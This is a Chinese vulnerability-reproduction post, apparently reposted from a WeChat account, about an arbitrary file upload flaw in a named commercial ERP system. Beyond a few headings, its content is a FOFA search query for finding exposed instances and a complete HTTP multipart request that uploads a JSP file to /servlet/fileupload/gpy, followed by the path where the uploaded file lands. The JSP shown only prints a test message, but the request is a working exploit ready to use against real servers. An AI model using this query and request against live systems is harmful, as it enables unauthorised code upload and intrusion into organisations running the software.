免责声明
漏洞描述
资产确定
fofa:
app="云时空社会化商业ERP系统"
漏洞复现
1.利用如下POC进行文件上传
POST /servlet/fileupload/gpy HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388
Content-Length: 238
--4eea98d02AEa93f60ea08dE3C18A1388
Content-Disposition: form-data; name="file1"; filename="check.jsp"
Content-Type: application/octet-stream
<% out.println("This website has a vulnerability"); %>
--4eea98d02AEa93f60ea08dE3C18A1388--
2.文件上传成功后路径为:/uploads/pics/上传日期/check.jsp
原文始发于微信公众号(我爱林):漏洞复现 || 某ERP系统任意文件上传
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论